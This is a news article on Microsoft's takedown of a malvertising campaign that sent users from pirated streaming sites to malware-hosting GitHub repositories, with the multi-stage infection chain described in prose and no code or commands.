Microsoft has moved swiftly to dismantle a vast malvertising campaign that leveraged GitHub repositories to distribute malware to nearly one million devices worldwide. The tech giant’s security team uncovered the campaign in early December 2024, tracing a series of malicious redirects that funneled unsuspecting users from pirated streaming sites to malware-hosting GitHub repositories.
The attack vector was deceptively simple yet highly effective. Cybercriminals injected malvertising scripts into video streams on illegal streaming platforms, which then rerouted victims through multiple redirectors before landing them on a GitHub page housing the malware. Microsoft’s analysis revealed that the threat actors behind the campaign employed an intricate multi-stage payload deployment process to infiltrate and compromise devices.
A Layered Attack Chain
Once a user landed on the malicious GitHub page, their device was infected with a first-stage malware designed to conduct reconnaissance, harvesting critical system details such as memory capacity, operating system information, screen resolution, and even user paths. This data was then exfiltrated, triggering the deployment of secondary payloads.
The attack escalated with a third-stage PowerShell script, which retrieved the NetSupport remote access trojan (RAT) from a command-and-control (C2) server, embedding it deep within the system registry to ensure persistence. This RAT opened the door to further infections, including the Lumma and Doenerium information stealers, which siphoned browser credentials and other sensitive user data.
Alternatively, in cases where the third-stage payload was an executable file, it deployed a sequence of scripts and renamed components of the AutoIt interpreter to further obfuscate its presence. These scripts enabled persistence, facilitated additional malware execution, and allowed attackers to manipulate system files using PowerShell commands. In advanced stages, attackers used PowerShell and RegAsm to disable security defenses, execute hidden files, and establish remote browser debugging.
While GitHub served as the primary hosting platform for initial payloads, Microsoft Threat Intelligence noted that the attackers also leveraged other popular platforms, including Dropbox and Discord, to distribute malware at various stages of the campaign.
A Sophisticated and Evasive Threat
Security experts believe that the threat actors behind this campaign are part of a larger Malware-as-a-Service (MaaS) ecosystem. Ensar Seker, CSO at SOCRadar, underscored the attackers’ use of advanced obfuscation techniques to evade detection.
“The attackers used geofencing, device fingerprinting, and cloaking techniques to evade detection, which means the malicious payload is only delivered to targeted users, making it harder for security solutions to track and mitigate the campaign,” Seker explained. “This campaign is likely part of a broader MaaS ecosystem, where attackers use pre-built malvertising kits to distribute payloads like stealers, ransomware, and banking trojans.
Malvertising has traditionally targeted Windows users, but with more professionals using macOS and Linux, we’ll see cross-platform payloads becoming more common.”
Microsoft is tracking the group behind this attack under the name Storm-0408, linking them to a broader network of cybercriminals specializing in remote access malware and information theft. Their tactics include phishing campaigns, search engine optimization (SEO) manipulation, and large-scale malvertising operations like this one.
The Rising Threat of Malvertising
The scale and complexity of this campaign highlight the growing threat posed by malvertising. By embedding malicious ads within high-traffic streaming sites, cybercriminals can effectively bypass traditional security measures and compromise vast numbers of users without requiring direct interaction, such as clicking a suspicious email link or downloading an unknown file.
Microsoft’s swift action in dismantling the GitHub repositories used in this campaign is a significant step in disrupting the attackers’ operations. However, the reliance on cloud-based platforms like GitHub, Dropbox, and Discord for malware distribution underscores the persistent challenge of securing widely used digital ecosystems.
As malvertising techniques evolve, enterprises and individual users alike must remain vigilant. Ensuring robust endpoint protection, avoiding pirated content sites, and staying informed about emerging threats will be crucial in mitigating the risks posed by increasingly sophisticated cybercriminal campaigns.